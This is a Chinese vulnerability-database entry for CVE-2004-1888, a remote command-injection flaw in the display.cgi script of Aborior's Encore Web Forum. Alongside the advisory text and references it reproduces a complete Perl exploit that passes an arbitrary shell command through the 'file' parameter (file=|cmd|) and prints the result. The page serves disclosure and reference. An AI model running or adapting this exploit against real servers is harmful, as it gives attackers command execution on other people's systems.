Aborior Encore Web Forum远程任意命令执行漏洞-安全小百科

Aborior Encore Web Forum远程任意命令执行漏洞

漏洞ID	1107844	漏洞类型	输入验证
发布时间	2004-04-03	更新时间	2005-10-20
CVE编号	CVE-2004-1888	CNNVD-ID	CNNVD-200412-425
漏洞平台	CGI	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/23907
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-425

|漏洞详情

Abrior’sEncoreWebForum是一款基于WEB的论坛系统。Abrior’sEncoreWebForum对用户提交的URI请求缺少充分过滤，远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。问题存在于’display.cgi’脚本上，由于对用户提交给’file’参数缺少充分过滤，提交包含SHELL元字符的数据可以WEB权限在系统上执行。

|漏洞EXP

source: http://www.securityfocus.com/bid/10040/info

Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input.

A remote attacker may exploit this condition to execute arbitrary commands in the context of the webserver that is hosting the vulnerable application. 

############################################################
#!/usr/bin/perl -w
#
# Remote Exploit Aborior's Encore Web Forum by Schizoprenic
# Bug found by k-159 from g-security.tk

require LWP::UserAgent;
use Getopt::Std;

getopts('t:d:c:');
our($opt_t, $opt_d, $opt_c);

my $target = $opt_t;
my $dir = $opt_d;
my $cmd = $opt_c;

print "Remote Exploit Aborior's Encore Web Forum  by Schizoprenicn";
print "Xnuxer Research Laboratory (http://www.infosekuriti.com)n";
print "Target: $targetn";
print "Path Dir: $dirn";
print "Command: $cmdn";

my $ua = LWP::UserAgent->new;
$ua->agent("IE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$req = "http://$target$dir/display.cgi?preftemp=temp&page=anonymous&file=|$cmd|";

my $response = $ua->get($req);
print "--------------------RESULT--------------------n";

if ($response->is_success) {
     print $response->content;
} else {
     die $response->status_line;
}

print "----------------------------------------------n";

# EOF by Xnuxer
--

|参考资料

来源:XF
名称:encore-display-command-execution(15725)
链接:http://xforce.iss.net/xforce/xfdb/15725
来源:BID
名称:10040
链接:http://www.securityfocus.com/bid/10040
来源:BUGTRAQ
名称:20040403RemoteExploitforAborior’sEncoreWebForum
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108100973820868&w;=2
来源:SECTRACK
名称:1009652
链接:http://www.securitytracker.com/id?1009652
来源:BUGTRAQ
名称:20060621Re:display.cgi
链接:http://www.securityfocus.com/archive/1/archive/1/437978/100/0/threaded
来源:BUGTRAQ
名称:20060620display.cgi
链接:http://www.securityfocus.com/archive/1/archive/1/437813/100/0/threaded
来源:OSVDB
名称:16831
链接:http://www.osvdb.org/16831
来源：NSFOCUS
名称：6275
链接：http://www.nsfocus.net/vulndb/6275

相关推荐: Ulrik Petersen Emdros Database Engine Denial Of Service Vulnerability

Ulrik Petersen Emdros Database Engine Denial Of Service Vulnerability 漏洞ID 1097953 漏洞类型 Design Error 发布时间 2004-09-08 更新时间 2004-09-…

文章版权归作者所有，未经允许请勿转载。

THE END